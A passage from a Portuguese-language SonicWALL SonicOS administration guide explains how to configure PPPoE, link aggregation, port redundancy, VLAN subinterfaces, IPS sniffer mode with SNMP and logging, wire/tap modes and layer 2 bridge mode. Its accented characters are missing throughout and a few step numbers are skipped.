WAN, a caixa de dilogo Editar interface exibe a guia Protocolo.
O Provedor de servios de Internet (ISP) configura os campos (por exemplo, endereo IP,
mscara de sub-rede e endereo de gateway SonicWALL) na seo Configuraes
adquiridas via da guia Protocolo. Esses campos mostraro valores reais depois de conectar
o dispositivo ao ISP.
Alm disso, especificar PPPoE faz com que o SonicOS defina a opo MTU de interface na
guia Avanado para 1492 e fornece configuraes adicionais na guia Protocolo.
Para definir configuraes adicionais para PPPoE:
Etapa 1 Na caixa de dilogo Editar interface, clique na guia Protocolo.

Etapa 2 Marque as caixas de seleo para habilitar as opes seguintes na seo Configuraes de
cliente PPPoE:
Desconexo por inatividade (minutos): Insira o nmero de minutos (o padro 10)
aps o qual o SonicOS terminar a conexo se detectar que os pacotes no esto
sendo enviados.
Usar estritamente pacotes de eco LCP para keep-alive de servidor: Selecione esta
opo para que o SonicOS termine a conexo se detectar que o servidor PPoE no
enviou um pacote de "solicitao de eco de LCP ppp" em um minuto. Selecione esta
opo somente se o seu servidor PPPoE suportar a funo "enviar eco de LCP".
Reconectar o cliente PPPOE se o servidor no enviar trfego durante __ minutos:
Insira o nmero de minutos (o padro 5) aps o qual o SonicOS terminar a conexo
do servidor PPPoE e, em seguida, reconectar, se o servidor no enviar quaisquer
pacotes (incluindo a solicitao de eco de LCP).
Configurar agregao de links e redundncia de portas

A agregao de links e a redundncia de portas so configuradas na guia Avanado da caixa
de dilogo Editar interface na interface do usurio do SonicOS.
Agregao de links na pgina 207 agrupa vrias interfaces de Ethernet formando um
nico link lgico para suportar maior velocidade de processamento do que uma nica
interface fsica consegue suportar. Isso permite enviar trfego de multigigabits entre dois
domnios de Ethernet.
Nota A Agregao de links para as Interfaces de rede no suportada no NSA 2600.
Redundncia de portas na pgina 208 configura uma nica porta redundante para
qualquer interface fsica que pode ser conectada a um segundo switch para evitar perda
de conectividade nos casos em que a interface primria ou o switch primrio switch falhar.

Nota A Redundncia de portas para as Interfaces de rede no suportada no NSA 2600.
Nota A Agregao de links e a Redundncia de portas no so suportadas na Interface de

Controle de AD.
Nota A Agregao de links no suportada no Modo de Ponte de Camada 2.
Agregao de links
A agregao de links usada para aumentar a largura de banda disponvel entre o firewall e
um switch agregando at quatro interfaces em um nico link agregado, designado Grupo de
agregao de links (LAG). Todas as portas em um link agregado devem estar conectadas ao
mesmo switch. O firewall usa um algoritmo round-robin para balanceamento de carga de
trfego nas interfaces em um Grupo de agregao de links. A agregao de links tambm
fornece uma medida de redundncia, em que se uma interface no LAG ficar inativa, as outras
interfaces permanecero conectadas.
A agregao de links referenciada por meio de terminologia diferente por fornecedores
diferentes, incluindo Canal de porta, Canal de Ether, Truncamento e Agrupamento de portas.
Failover de agregao de links

A SonicWALL fornece vrios mtodos de proteo contra a perda de conectividade no caso de
falha de um link, incluindo Alta disponibilidade (HA), Grupos de balanceamento de carga
(Grupos de LB) e agora Agregao de links. Se estes trs recursos forem configurados em um
firewall, a seguinte ordem de prioridade seguida no caso de falha de um link:
1. Alta disponibilidade
2. Agregao de links
3. Grupos de balanceamento de carga
A HA prevalece sobre a agregao de links. Uma vez que cada link no LAG possui um
compartilhamento igual da carga, a perda de um link no firewall Ativo forar um failover no
firewall Ocioso (se todos os seus links permanecerem conectados). O monitoramento fsico
precisa ser configurado apenas na porta de agregado primria.
Quando a agregao de links usada com um grupo de LB, a agregao de links ter
precedncia. O LB assumir somente se todas as portas no link agregado estiverem inativas.
Limitaes da agregao de links

Atualmente somente o endereamento esttico suportado para agregao de links
O Protocolo de controle de agregao de links (LACP) no suportado atualmente
Configurao da agregao de links
Para configurar a agregao de links, execute as seguintes tarefas:

Etapa 1 Na pgina Rede > Interfaces, clique no cone Configurar da interface que deve ser designada
a mestre do grupo de agregao de links. A caixa de dilogo Editar interface exibida.
Etapa 3 No menu suspenso Redundncia/agregao de portas selecione Agregao de links.
Etapa 4 A opo Porta de agregado exibida com uma caixa de seleo para cada uma das interfaces
no atribudas atualmente no firewall. Selecione at trs interfaces diferentes para atribuir ao
LAG.
Nota Depois de uma interface ser atribuda a um Grupo de agregao de links, sua configurao
regida pela interface mestre da agregao de links e no pode ser configurada de forma
independente. Na tabela Configuraes de interface, a zona da interface exibida como
"Porta de agregado" e o cone de configurao removido.
Etapa 5 Defina a Velocidade de link da interface para Negociar automaticamente.

Nota A agregao de links exige uma configurao correspondente no switch. O mtodo do

switch de balanceamento de carga depender consideravelmente do fornecedor. Consulte
a documentao do switch para obter informaes sobre como configurar a agregao de
links. Lembre-se de que ela pode ser designada como Canal de porta, Canal de Ether,
Truncamento ou Agrupamento de portas.
Redundncia de portas
A redundncia de portas fornece um mtodo simples para configurar uma porta redundante
para uma porta fsica de Ethernet. Este um recurso valioso, principalmente em implantaes
avanadas, para proteo contra falhas de switch como um ponto nico de falha.
Quando a interface primria est ativa, ela processa todo o trfego de e para a interface. Se a
interface primria ficar inativa, a interface secundria assumir todo o trfego de entrada e de
sada. A interface secundria assume o endereo MAC da interface primria e envia o ARP
gratuito apropriado em um evento de failover. Quando a interface primria fica ativa
novamente, ela retomar a responsabilidade por todo o trfego, tratando das obrigaes da
interface secundria.
Em uma configurao tpica de redundncia de portas, as interfaces primria e secundria
esto conectadas a switches diferentes. Isso fornece um caminho de failover no caso de o
switch primrio ficar inativo. Os dois switches devem estar no mesmo domnio de Ethernet. A
redundncia de portas tambm pode ser configurada com ambas as interfaces conectadas ao
mesmo switch.
Failover de redundncia de portas

A SonicWALL fornece vrios mtodos de proteo contra a perda de conectividade no caso de
falha de um link, incluindo Alta disponibilidade (HA), Grupos de balanceamento de carga
(Grupos de LB) e agora Redundncia de portas. Se estes trs recursos forem configurados em
um firewall, a seguinte ordem de prioridade seguida no caso de falha de um link:
1. Redundncia de portas
2. HA
3. Grupo de LB

Quando a redundncia de portas usada com HA, a redundncia de portas ter precedncia.
Normalmente um failover de interface causar a ocorrncia de um failover de HA, mas se uma
porta redundante estiver disponvel para essa interface, ocorrer ento um failover de
interface, mas no um failover de HA. Se as duas portas redundantes primria e secundria
ficarem inativas, ocorrer um failover de HA (supondo que o firewall secundrio tem a porta
correspondente ativa).
Quando a redundncia de portas usada com um grupo de LB, a redundncia de portas ter
novamente precedncia. Qualquer falha de porta nica (primria ou secundria) ser
manipulada pela redundncia de portas exatamente como com a HA. Quando as duas portas
esto inativas, o LB acionado e tenta encontrar uma interface alternativa.
Configurao de redundncia de portas
Para configurar a redundncia de portas, execute as seguintes tarefas:
Etapa 1 Na pgina Rede > Interfaces, clique no cone Configurar da interface que deve ser designada
a mestre do grupo de agregao de links. A caixa de dilogo Editar interface exibida.
Etapa 3 No menu suspenso Redundncia/agregao de portas selecione Redundncia de portas.
Etapa 4 O menu suspenso Porta redundante exibido com todas as interfaces no atribudas
atualmente disponveis. Selecione uma das interfaces.
Nota Depois de selecionar uma interface como uma porta redundante, a sua configurao ser
regida pela interface primria e no pode ser configurada de forma independente. Na tabela
Configuraes de interface, a zona da interface exibida como "Porta redundante" e o
cone de configurao removido.
Etapa 5 Defina a Velocidade de link da interface para Negociar automaticamente.

Configurar subinterfaces de VLAN

Quando voc adiciona uma subinterface de VLAN, voc precisa atribu-la a uma zona, a uma
marca VLAN e a uma interface fsica. Com base em sua atribuio de zonas, voc deve
configurar a subinterface de VLAN da mesma forma que configurou uma interface fsica na
mesma zona.
Adicionar uma interface virtual
Etapa 1 No menu de navegao esquerda, clique em Rede e, em seguida, Interfaces para exibir a
pgina Rede > Interfaces.
Etapa 2 Na parte inferior da tabela Configuraes de interface, clique em Adicionar interface. A caixa
de dilogo Editar interface exibida.
Etapa 3 Selecione uma zona para atribuir interface. Voc pode selecionar LAN, WAN, DMZ, WLAN
ou uma zona personalizada. A atribuio de zonas no precisa ser a mesmo que a interface
(fsica) pai. Na verdade, a interface pai ainda pode permanecer No atribuda.
Suas opes de configurao para as configuraes de rede da subinterface dependem da
zona que voc selecionar.
LAN, DMZ ou uma zona personalizado de tipo Confivel: Esttico ou Transparente

WLAN ou uma zona sem fio personalizada: somente IP esttico (nenhuma lista de
atribuio de IP).
Etapa 4 Atribua uma marca VLAN (ID) subinterface. Os IDs de VLAN vlidos so 1 a 4094, embora
alguns switches reservem a VLAN 1 para designao de VLAN nativa. Ser necessrio criar
uma subinterface de VLAN com um ID de VLAN correspondente para cada VLAN que desejar
proteger com seu dispositivo de segurana.
Etapa 5 Declare a interface (fsica) pai qual esta subinterface pertencer. No h nenhum limite por
interface para o nmero de subinterfaces que voc pode atribuir. Voc poder atribuir
subinterfaces at o limite do sistema.
Etapa 6 Defina as configuraes de rede de subinterface com base na zona selecionada. Consulte as
instrues de configurao de interface nesta seo:
Configurar uma interface esttica na pgina 193
Definir configuraes avanadas para uma interface esttica na pgina 194
Configurar interfaces no modo de IP transparente (unir sub-rede L3) na pgina 197
Configurar interfaces sem fio na pgina 200
Configurar uma interface de WAN na pgina 202
Configurar subinterfaces de VLAN na pgina 209
Etapa 7 Selecione os mtodos de gerenciamento e login do usurio da subinterface.
Configurar o modo de sniffer IPS

Para configurar o firewall para o modo de Sniffer IPS, voc usar duas interfaces na mesma
zona para o par de ponte L2. Voc pode usar qualquer interface, exceto a interface de WAN.
Para esse exemplo, vamos usar X2 e X3 para o par de ponte e configur-las para estarem na
zona da LAN. A interface de WAN (X1) usada pelo firewall para acesso ao Centro de Dados
do firewall, conforme necessrio. A porta espelhada no switch ir se conectar a uma das
interfaces no par de ponte.
Esta seo contm os tpicos seguintes:
Lista de tarefas de configurao para o modo de sniffer IPS na pgina 210
Configurar a interface de ponte primria na pgina 211
Configurar a interface de ponte secundria na pgina 211
Habilitar e configurar SNMP na pgina 212
Configurar servios de segurana (gerenciamento unificado de ameaas) na pgina 213
Configurar o log na pgina 213
Conectar a porta do switch espelhada a uma interface de modo de sniffer IPS na
pgina 213
Conectar e configurar a interface de WAN no centro de dados na pgina 214
Lista de tarefas de configurao para o modo de sniffer IPS

Configurar a interface de ponte primria
Selecionar a LAN como a zona da interface de ponte primria
Atribuir um endereo IP esttico
Configurar a interface de ponte secundria
Selecionar a LAN como a zona da interface de ponte secundria

Habilitar a ponte L2 na interface de ponte primria
Habilitar SNMP e configurar o endereo IP do sistema gerenciador de SNMP onde podem
ser enviadas capturas
Configurar servios de segurana (UTM) para trfego de LAN
Definir configuraes de alerta de log para "Alerta" ou inferior
Conectar a porta espelhada no switch a qualquer uma das interfaces no par de ponte
Conectar e configurar a WAN para permitir o acesso a dados de assinatura dinmica pela
Internet
Etapa 1 Selecione a guia Rede, a pasta Interfaces no painel de navegao.

Etapa 2 Clique no cone Configurar na coluna direita da interface X2.
Etapa 3 Na caixa de dilogo Editar interface na guia Geral, selecione LAN na lista suspensa Zona.
Observe que no necessrio definir as configuraes nas guias Avanado ou Filtragem
VLAN.
Etapa 4 Para a Atribuio de IP, selecione Esttico na lista suspensa.
Etapa 5 Configure a interface com um endereo IP esttico (por exemplo, 10.1.2.3). O endereo IP que
voc escolher no deve entrar em conflito com nenhuma das redes que so vistas pelo switch.
Nota A interface de ponte primria deve ter uma atribuio de IP esttico.
Etapa 6 Configure a mscara de sub-rede.

Etapa 7 Insira um comentrio descritivo.
Etapa 8 Selecione as opes de gerenciamento da interface (HTTP, HTTPS, Ping, SNMP, SSH, Logins
do usurio, Redirecionamentos HTTP).

Nosso exemplo continua com X3 como a interface de ponte secundria.

Etapa 2 Clique no cone Configurar na coluna direita da interface X3.
Etapa 3 Na caixa de dilogo Editar interface na guia Geral, selecione LAN na lista suspensa Zona.

Observe que no necessrio definir as configuraes nas guias Avanado ou Filtragem
VLAN.
Etapa 4 Na lista suspensa Atribuio de IP, selecione Modo de ponte de camada 2.
Etapa 5 Na lista suspensa Ponte para, selecione a interface X2.
Etapa 6 No habilite a configurao Bloquear todo o trfego no IPv4 se desejar monitorar o trfego
no IPv4.
Etapa 7 Selecione Nunca rotear trfego nesse par com ponte para garantir que o trfego da porta
do switch espelhada no enviado novamente para a rede.
Etapa 8 Selecione Detectar somente trfego nesse par com ponte para permitir a deteco ou o
monitoramento de pacotes que chegam ponte L2 da porta do switch espelhada.
Etapa 9 Selecione Desabilitar inspeo estvel nesse par com ponte para isentar essas interfaces
de inspeo de alta disponibilidade estvel. Se os servios de inspeo profunda de pacotes
estiverem habilitados para essas interfaces, os servios de DPI continuaro sendo aplicados.
Etapa 10 Configure o gerenciamento (HTTP, HTTPS, Ping, SNMP, SSH, Logins do usurio,
Redirecionamentos HTTP).
Habilitar e configurar SNMP

Quando o SNMP habilitado, as capturas de SNMP so acionadas automaticamente para
muitos eventos que so gerados pelos servios de segurana da SonicWALL como Preveno
de intruso e Antivrus do gateway.
Mais de 50 eventos de IPS e GAV acionam atualmente capturas de SNMP. O SonicOS Log
Event Reference Guide contm uma lista de eventos que so registrados pelo SonicOS e inclui
o nmero de captura de SNMP, se aplicvel. O guia est disponvel online em
http://www.sonicwall.com/us/Support.html digitando Evento de log no campo de pesquisa na
parte superior da pgina.
Para determinar as capturas que so possveis usando o modo de sniffer IPS com a preveno
de intruso habilitada, procure Intruso na tabela encontrada na seo do ndice de
mensagens de eventos de log no SonicOS Log Event Reference Guide. O nmero de captura
de SNMP, se estiver disponvel para esse evento, impresso na coluna Tipo de captura de
SNMP da tabela.
Para determinar as possveis capturas com o Antivrus do gateway habilitado, pesquise na
tabela Servios de segurana e visualize o nmero de captura de SNMP na coluna Tipo de
captura de SNMP.

Para habilitar e configurar o SNMP:
Etapa 1 Selecione a guia Sistema, pasta Administrao no painel de navegao.

Etapa 2 Role para baixo at a seo Gerenciamento avanado.
Etapa 3 Marque a caixa de seleo Habilitar SNMP. O boto Configurar fica ativo.
Etapa 4 Clique em Configurar. exibida a caixa de dilogo Configuraes de SNMP.
Etapa 5 Na caixa de dilogo Configuraes de SNMP, para o Nome do sistema, digite o nome do
sistema gerenciador de SNMP que receber as capturas enviadas do firewall.
Etapa 6 Insira o nome ou endereo de e-mail da pessoa de contato para Contato de SNMP
Etapa 7 Digite uma descrio do local do sistema, como "laboratrio do 3 andar".
Etapa 8 Insira o nmero de ativo do sistema.
Etapa 9 Para Obter nome da comunidade, digite o nome de comunidade que tem permisses para
recuperar informaes de SNMP do firewall, por exemplo, pblico.
Etapa 10 Para Capturar nome da comunidade, digite o nome da comunidade que ser usada para enviar
capturas de SNMP do firewall para o gerenciador de SNMP, por exemplo, pblico.
Etapa 11 Para os campos Host, digite os endereos IP dos sistemas gerenciadores de SNMP que
recebero as capturas.
Configurar servios de segurana (gerenciamento unificado de ameaas)

As configuraes que voc habilitar nesta seo controlaro o tipo de trfego mal-intencionado
que voc detectar no modo de sniffer IPS. Normalmente voc ir querer habilitar a preveno
de intruso, mas tambm poder querer habilitar outros servios de segurana como o Anti-
spyware ou o Antivrus do gateway.
Para habilitar os servios de segurana, seu SonicWALL deve ter as respectivas licenas e as
assinaturas devem ser baixadas do centro de dados do firewall. Para concluir as instrues
sobre como habilitar e configurar IPS, GAV e Anti-spyware, consulte a seo de Servios de
segurana neste guia.
Configurar o log
Voc pode configurar o log para registrar entradas de ataques detectados pelo firewall.
Para habilitar o log, execute as seguintes etapas:
Etapa 1 Selecione a guia Log, a pasta Categorias no painel de navegao.

Etapa 2 Em Categorias de log, selecione Todas as categorias na lista suspensa Ver estilo.
Etapa 3 Na categoria de ataques, habilite as caixas de seleo de Log, Alertas e Syslog.
Etapa 4 Clique em Aplicar.
Conectar a porta do switch espelhada a uma interface de modo de sniffer IPS

Use um cabo Ethernet de categoria 5 padro para conectar a porta do switch espelhada a uma
das interfaces no par de ponte. O trfego de rede ser enviado automaticamente do switch
para o firewall onde pode ser inspecionado.

Consulte a documentao do switch para obter instrues sobre como configurar a porta
espelhada.
Conectar e configurar a interface de WAN no centro de dados

Conecte a porta WAN no firewall, geralmente a porta X1, ao seu gateway ou a um dispositivo
com acesso ao gateway. O firewall comunica automaticamente com o respectivo centro de
dados. Para obter instrues detalhadas sobre como configurar a interface de WAN, consulte
Configurar uma interface de WAN na pgina 202.
Configurar o modo de cabo e de tap

O SonicOS suporta o modo de cabo e o modo de tap, os quais fornecem novos mtodos no
prejudiciais e de insero incremental em redes.
Configurao do
modo de cabo Descrio
Modo de bypass O modo de bypass permite a Introduo rpida e relativamente contnua de
hardware de firewall em uma rede. Ao selecionar um ponto de insero em uma
rede (por exemplo, entre um switch central e um firewall de permetro, na frente de
um farm de servidor VM, em um ponto de transio entre domnios de classificao
de dados), o firewall inserido no caminho de dados fsicos, exigindo uma janela
de manuteno muito curta. Um ou mais pares de portas do switch no firewall so
usados para encaminhar todos os pacotes em segmentos a taxas de linha
completas, ficando todos os pacotes na malha do switch de 240 Gbps do firewall
em vez de passarem para o caminho de imposio e inspeo de vrios ncleos.
Enquanto o modo de bypass no oferece qualquer inspeo ou aplicao de
firewall, esse modo permite que o administrador introduza fisicamente o firewall na
rede com um mnimo de tempo de inatividade e risco e obtenha um nvel de
conforto com o componente recentemente inserido da infraestrutura de rede e
segurana. O administrador pode ento fazer a transio instantaneamente do
modo Bypass para o modo Inspecionar ou Proteger atravs de uma simples
reconfigurao orientada pela interface do usurio.
Modo Inspecionar O modo Inspecionar estende o modo Bypass sem alterar funcionalmente o
caminho do pacote de baixo risco e latncia zero. Os pacotes continuam a passar
pela malha do switch do firewall, mas eles tambm so espelhados no mecanismo
RF-DPI de vrios ncleos para fins de inspeo passiva, classificao e relatrios
de fluxo. Isso revela recursos de deteco de ameaas e inteligncia de aplicativo
do firewall sem qualquer processamento intermedirio real.
Modo Proteger O modo Proteger a progresso do modo Inspecionar, interpondo ativamente
processadores de vrios ncleos do firewall no caminho de processamento de
pacotes. Isso amplia o conjunto completo de recursos dos mecanismos de
inspeo e poltica, incluindo controle e inteligncia de aplicativo, servios de
preveno de intruso, antivrus baseado em gateway e em nuvem, anti-spyware e
filtragem de contedo. O modo Proteger proporciona o mesmo nvel de visibilidade
e imposio que as implantaes convencionais de NAT ou modo de ponte L2,
mas sem quaisquer transformaes de L3/L4 e sem alteraes de ARP ou
comportamento de roteamento. O modo Proteger fornece assim uma implantao
NGFW incrementalmente atingvel, no exigindo alteraes lgicas, apenas
alteraes fsicas mnimas, nos designs de rede existentes.

Configurao do
modo de cabo Descrio
Modo de tap O modo de tap oferece a mesma visibilidade que o modo Inspecionar, mas difere
deste, pois consome um fluxo de pacotes espelhados por meio de uma porta de
switch nica no firewall, eliminando a necessidade de insero fisicamente
intermediria. O modo de tap foi projetado para uso em ambientes empregando
taps de rede, taps inteligentes, espelhos de porta ou portas SPAN para transmitir
pacotes a dispositivos externos para inspeo ou coleta. Tal como acontece com
todas as outras formas de Modo de cabo, o Modo de tap pode operar em vrias
instncias de porta simultneas, suportando fluxos discretos de vrios taps.
Para resumir as principais diferenas funcionais entre os modos de configurao da interface:
Modo Modos Ponte L2,

Modo de Inspecio Modo Modo de Transparente,
bypass nar Proteger tap NAT, Rota
Clustering ativo/ativo a No No No No Sim
Controle de aplicativos No No Sim No Sim

Visibilidade de aplicativos No Sim Sim Sim Sim
ARP/Roteamento/NAT a No No No No Sim
Servio anti-spam abrangente a No No No No Sim
Filtragem de contedo No No Sim No Sim
Servidor DHCP a No No No No Sim b

Deteco de DPI No Sim Sim Sim Sim
Preveno de DPI No No Sim No Sim
DPI-SSLa No No No No Sim
Alta disponibilidade Sim Sim Sim Sim Sim
Propagao do estado de link c Sim Sim Sim No No
SPI No Sim Sim Sim Sim
Imposio de handshake TCP d No No No No Sim
Grupos virtuais a No No No No Sim

a. Essas funes ou servios no esto disponveis em interfaces configuradas no Modo de cabo, mas permanecem disponveis em
um nvel de sistema para quaisquer interfaces configuradas em outros modos de operao compatveis.
b. Indisponvel no modo de ponte L2.
c.A Propagao do estado de link um recurso atravs do qual as interfaces em um par de Modo de cabo espelham o estado de
link acionado por transies de seus parceiros. Isso essencial para operaes adequadas em redes de caminho redundante.
d. Desabilitada por design no Modo de cabo para permitir que eventos de failover ocorram em outro lugar na rede para serem
suportados quando estiverem sendo usados vrios caminhos de Modo de cabo ou vrias unidades de firewall ao longo de
caminhos redundantes ou assimtricos.
Nota Ao operar no Modo de cabo, a interface dedicada de "Gerenciamento" do firewall ser

usada para gerenciamento local. Para habilitar o gerenciamento remoto e atualizaes de
inteligncia de aplicativos e servios de segurana dinmica, deve ser configurada uma
interface de WAN (separada das interfaces do Modo de cabo) para conectividade com a
Internet. Isso feito facilmente, pois o SonicOS suporta interfaces em modo mistos de
praticamente qualquer combinao.

Configurar uma interface para o modo de cabo
Para configurar uma interface para o modo de cabo, realize as seguintes etapas:
Etapa 1 Na pgina Rede > Interfaces, clique no boto Configurar da interface que deseja configurar
para o modo de cabo.
Etapa 2 No menu suspenso Zona, selecione qualquer tipo de zona, exceto WLAN.
Etapa 3 Para configurar a Interface para o Modo de tap, no menu suspenso Atribuio de IP/modo
selecione Modo de tap (tap de 1 porta).
Para configurar a Interface para Modo de cabo, no menu suspenso Atribuio de IP/
modo selecione Modo de cabo (cabo de 2 portas).
Etapa 4 No menu suspenso Tipo de modo de cabo selecione o modo apropriado:
Ignorar (por meio de comutador interno/retransmisso)
Inspecionar (DPI passiva de trfego espelhado)
Assegurar (DPI ativo de trfego embutido)
Etapa 5 No menu suspenso Interface emparelhada selecione a interface que ser conectada ao
firewall upstream. As interfaces emparelhadas devem ser do mesmo tipo (duas interfaces de
1 GB ou duas interfaces de 10 GB).
Nota Somente esto disponveis interfaces no atribudas no menu suspenso Interface

emparelhada. Para tornar uma interface no atribuda, clique no boto Configurar da
interface e, no menu suspenso Zona, selecione No atribudo.

O Modo de cabo pode ser configurado na WAN, LAN, DMZ e em zonas personalizadas (exceto
zonas sem fio). O modo de cabo uma forma simplificada de modo de ponte de camada 2 e
est configurado como um par de interfaces. No modo de cabo, a zona de destino a Zona de
interface emparelhada. As regras de acesso so aplicadas ao par do modo de cabo com base
na direo do trfego entre a Zona de origem e a sua Zona de interface emparelhada. Por
exemplo, se a Zona de origem for WAN e a Zona de interface emparelhada for LAN, ento
sero aplicadas regras de WAN para LAN e LAN para WAN, dependendo da direo do
trfego.
No Modo de cabo, os administradores podem habilitar a Propagao do estado de link que
propaga o status de link de uma interface sua interface emparelhada. Se uma interface ficar
inativa, forada a inatividade da respectiva interface emparelhada para espelhar o status de
link da primeira interface. As duas interfaces em um par de modo de cabo sempre tm o mesmo
status de link.
No Modo de cabo, os administradores podem Desabilitar a inspeo estvel. Quando a
opo Desabilitar inspeo estvel estiver selecionada, a inspeo de pacotes estvel (SPI)
desativada. Quando a opo Desabilitar inspeo estvel no estiver selecionada, podem
ser estabelecidas novas conexes sem impor um handshake TCP de trs vias. A opo
Desabilitar inspeo estvel deve ser selecionada se forem implantadas rotas assimtricas.
Configurar o modo de cabo para um par de zona de WAN/LAN

A configurao a seguir um exemplo de como o Modo de cabo pode ser configurado. Este
exemplo destina-se a uma zona de WAN emparelhada com uma zona de LAN. O Modo de cabo
tambm pode ser configurado para zonas personalizadas e DMZ.

Para configurar o Modo de cabo para um par de zona de WAN/LAN:
Etapa 1 Navegue at Rede > Interfaces.

Etapa 2 Clique no boto Adicionar interface.
ou
Clique no boto Configurar da interface que voc deseja configurar.
Etapa 3 Na guia Geral, na lista Atribuio de IP, selecione Modo de cabo (cabo de 2 portas).
Etapa 4 Na lista Zona selecione WAN.

Etapa 5 Na lista Zona de Interface emparelhada selecione LAN.
Etapa 6 Selecione a opo Desabilitar inspeo estvel.
Etapa 7 Selecione a opo Habilitar propagao do estado de link.
Etapa 8 Clique no boto OK.
Modo de cabo com agregao de links

A agregao de links (LAG) usada para agrupar vrios links em uma nica interface para
aumentar a largura de banda. Para inspecionar o trfego atravs de uma interface de LAG,
possvel conectar um dispositivo de segurana de rede Dell SonicWALL em linha, permitindo
a transio de forma transparente dos pacotes enviados em um link para o destino. Os
recursos de modo de cabo existentes, como propagao do estado de link, so suportados.
At 8 membros por LAG so suportados.
O Modo de cabo e a Agregao de links so configurados na pgina Rede > Interfaces no
SonicOS. Na guia Avanado da tela de configurao da interface exibida a lista de interfaces
no atribudas. O administrador pode selecionar interfaces de membros para cada lado da
conexo do Modo de cabo. O nmero de membros em cada lado deve ser igual.
recomendvel que o tipo e o tamanho da largura de banda das interfaces de membros tambm
correspondam.
Para configurar o Modo de cabo com LAG:
Etapa 1 Navegue at a pgina Rede > Interfaces.

Etapa 2 Clique no cone de configurao da interface que voc deseja configurar.

Na guia Geral:
Etapa 3 No menu Zona, selecione a zona desejada.
Etapa 4 No menu Atribuio de IP/modo, selecione Modo de cabo (cabo de 2 portas).
Etapa 5 No menu Tipo de modo de cabo, selecione Assegurar (DPI ativa de trfego embutido).
Etapa 6 No menu Interface emparelhada, selecione a interface desejada.
Etapa 7 No menu Zona de interface emparelhada, selecione a interface desejada.
Etapa 8 (Opcional) Selecione a opo Desabilitar inspeo estvel se desejar.

Etapa 9 (Opcional) Selecione a opo Habilitar propagao do estado de link se desejar.

Na guia Avanado:
Etapa 10 No menu Redundncia/Agregao de portas, selecione Agregao de links.
Etapa 11 Para Porta de agregado, selecione a porta desejada.
Etapa 12 Para Agregao de portas da interface emparelhada, selecione a porta desejada.

A configurao exibida na tabela na pgina Rede > Interfaces.
Modo de ponte de camada 2

O SonicOS inclui Modo de ponte L2 (camada 2), um mtodo discreto de integrao de um
firewall em qualquer rede Ethernet. O Modo de ponte L2 aparentemente semelhante ao
Modo transparente do SonicOS, pois permite que um firewall compartilhe uma sub-rede
comum entre duas interfaces e realize uma inspeo estvel e profunda de pacotes em todo o
trfego de IP transmitido, mas funcionalmente muito mais verstil.
Em particular, o Modo de ponte L2 emprega uma arquitetura de ponte de aprendizado segura,
permitindo que passe e inspecione tipos de trfego que no podem ser tratados por muitos
outros mtodos de integrao de dispositivo de segurana transparente. Usando o Modo de
ponte L2, possvel adicionar de forma ininterrupta um dispositivo de segurana Dell
SonicWALL a qualquer rede Ethernet para fornecer uma inspeo profunda de pacotes em

linha para todo o trfego TCP e UDP IPv4 transmitido. Nesse cenrio, o firewall no usado
para imposio de segurana, mas em vez disso para verificao bidirecional, bloqueando
vrus e spyware e interrompendo tentativas de intruso.
Ao contrrio de outras solues transparentes, o modo de ponte L2 pode passar todos os tipos
de trfego, incluindo VLANs 802.1Q IEEE, Protocolo de rvore de extenso, difuso seletiva,
difuso e IPv6, garantindo que todas as comunicaes de rede continuam sem interrupes.
Outro aspecto da versatilidade do Modo de ponte L2 que voc pode us-lo para configurar o
Modo de sniffer IPS. Suportado em dispositivos de segurana Dell SonicWALL, o Modo de
Sniffer IPS usa uma nica interface de um par de ponte para monitorar o trfego de rede de
uma porta espelhada em um switch. O Modo de sniffer IPS oferece deteco de intruses, mas
no consegue bloquear trfego malicioso porque o firewall no est conectado em linha ao
fluxo de trfego. Para obter mais informaes sobre o Modo de sniffer IPS, consulte Modo de
sniffer IPS na pgina 190.
O Modo de ponte L2 fornece uma soluo ideal para redes que j tm um firewall e no tm
planos imediatos para substituir seu firewall existente, mas desejam adicionar a segurana da
inspeo profunda de pacotes do Gerenciamento unificado de ameaas (UTM) da SonicWALL,
como Servios de preveno de intruso, Antivrus de gateway e Anti-spyware de gateway. Se
voc no tiver assinaturas de servios de segurana de UTM da SonicWALL, voc pode se
inscrever para avaliaes gratuitas na pgina Servio de segurana > Resumo de seu
SonicWALL.
Voc tambm pode usar o Modo de ponte L2 em uma implantao de Alta disponibilidade.
Esse cenrio explicado em Modo de ponte de camada 2 com alta disponibilidade na
pgina 237.
Nota A Agregao de links no suportada no Modo de Ponte de Camada 2.

Recursos principais do modo de ponte de camada 2 do SonicOS na pgina 220
Conceitos principais para configurar o modo de ponte L2 e o modo transparente na
pgina 221
Comparar o modo de ponte L2 com o modo transparente na pgina 223
Determinao de caminho de ponte L2 na pgina 231
Seleo de zona de interface de ponte L2 na pgina 232
Exemplos de topologias na pgina 234
Recursos principais do modo de ponte de camada 2 do SonicOS

A tabela a seguir descreve os benefcios de cada recurso principal do modo de ponte de
camada 2:
Recurso Benefcio
Ponte L2 com inspeo profunda de Esse mtodo de operao transparente significa que um
pacotes dispositivo de segurana Dell SonicWALL pode ser adicionado
a qualquer rede sem a necessidade de novo endereamento
ou reconfigurao, permitindo a adio de servios de
segurana de inspeo profunda de pacotes sem causar
interrupes nos designs de rede existentes. Desenvolvido
levando em conta a conectividade e a segurana de igual
forma, o Modo de ponte L2 consegue passar todos os tipos de
quadro de Ethernet, garantindo integrao perfeita.

Recurso Benefcio
Arquitetura de ponte de aprendizado O verdadeiro comportamento de L2 significa que todo o trfego
segura permitido flui nativamente por meio da ponte L2. Enquanto
outros mtodos de operao transparente dependem de
manipulao de ARP e rota para alcanar transparncia, o que
frequentemente se comprova ser problemtico, o Modo de
ponte L2 aprende dinamicamente a topologia da rede para
determinar caminhos de trfego ideais.
Suporte de tipo de quadro de Ethernet Todo o trfego de Ethernet pode ser transmitido atravs de
universal uma ponte L2, o que significa que todas as comunicaes de
rede continuaro sem interrupes. Embora muitos outros
mtodos de operao transparente suportem somente trfego
IPv4, o Modo de ponte L2 inspecionar todo o trfego IPv4 e
transmitir (ou bloquear, se desejado) todo o outro trfego,
incluindo LLC, todos os tipos ether e at mesmo formatos de
quadro proprietrios.
Operao de modo misto O modo de ponte L2 pode simultaneamente fornecer ponte L2
e servios convencionais de dispositivo de segurana, como
roteamento, NAT, VPN e operaes sem fio. Isso significa que
ele pode ser usado como uma ponte L2 para um segmento da
rede, fornecendo tambm um conjunto completo de servios
de segurana para a parte restante da rede. Isso tambm
permite a Introduo do dispositivo de segurana Dell
SonicWALL como uma ponte L2 pura, com um caminho de
migrao suave para operao completa de servios de
segurana.
Ponte de camada 2 sem fio Use uma nica sub-rede IP em vrios tipos de zona, incluindo
